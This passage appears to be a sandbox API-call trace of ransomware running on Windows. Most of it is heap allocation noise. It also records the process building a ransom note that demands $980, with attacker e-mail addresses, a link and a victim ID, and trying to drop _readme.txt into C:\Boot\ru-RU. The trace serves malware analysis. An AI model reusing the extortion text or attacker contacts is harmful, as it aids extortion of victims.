0x32d9428 [0209.830] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.830] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.830] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.830] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.830] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.830] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.830] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.830] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.830] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.830] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.830] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.830] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.830] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.830] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.830] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.830] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.830] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.830] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.831] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.831] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.831] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.831] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.831] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.831] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.831] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.831] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.831] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.831] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.831] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.831] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.831] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.831] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.831] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.831] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.831] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.831] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.831] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.831] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.831] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.831] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.831] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.831] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.831] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.831] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.832] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.832] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.832] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.832] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.832] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.832] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.832] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.832] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.832] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.832] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.832] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.832] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.832] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.832] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.832] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.832] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.832] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.832] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.832] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.832] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.832] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.832] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.832] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.832] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.833] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.833] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.833] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.833] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.833] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.833] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.833] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.833] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.833] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.833] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.833] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.833] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.833] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.833] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.833] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.833] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.833] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.833] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.833] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.833] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.833] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.833] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.833] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.833] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.833] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.834] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.834] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.834] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.834] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.834] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.834] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.834] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.834] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.834] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.834] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0209.834] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.834] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.834] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.834] PathFindFileNameW (pszPath="") returned="" [0209.834] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.834] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.835] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.835] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x3a83058 [0209.835] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.835] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9428 [0209.835] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.835] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.835] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0209.835] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.835] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0209.837] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.837] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.837] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.837] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.837] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.837] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.838] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.838] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.838] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.838] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.838] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.838] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.838] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.838] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.838] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.838] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.838] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.838] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.838] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.839] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.839] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.839] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.839] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.839] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.839] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.839] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.839] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.839] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.839] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.839] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.839] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.839] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.839] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.839] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.839] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.839] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.839] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.839] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.839] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.839] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.839] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.839] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.839] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.839] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.840] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.840] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.840] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.840] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.840] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.840] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.840] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.840] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.840] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.840] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.840] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.840] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.840] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.840] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.840] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.840] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.840] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.840] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.840] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.840] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.840] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.840] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.840] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.840] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.840] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 